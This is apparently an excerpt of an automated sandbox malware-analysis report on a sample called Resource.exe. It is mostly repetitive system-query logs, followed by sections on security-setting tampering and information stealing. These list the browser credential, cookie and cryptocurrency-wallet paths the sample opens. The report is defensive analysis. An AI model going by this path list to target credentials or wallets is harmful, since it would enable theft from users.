              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60AC460 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6E60AC460
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C6370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6E60C6370
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6186048CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,103_2_00007FF6186048CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\Resource.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2019140558.00000203A2F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2473117545.0000020AB3C0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2019140558.00000203A2F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2467713655.0000020AB46E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Resource.exe PID: 6632, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Resource.exe PID: 6048, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI66322\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: Resource.exe PID: 6048, type: MEMORYSTR
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB41C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Roaming\Exodus\exodus.walletan
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB41C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Roaming\Ethereum\keystored.lnk
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: Resource.exe, 00000001.00000003.2182427502.0000020AB3C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackupsJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
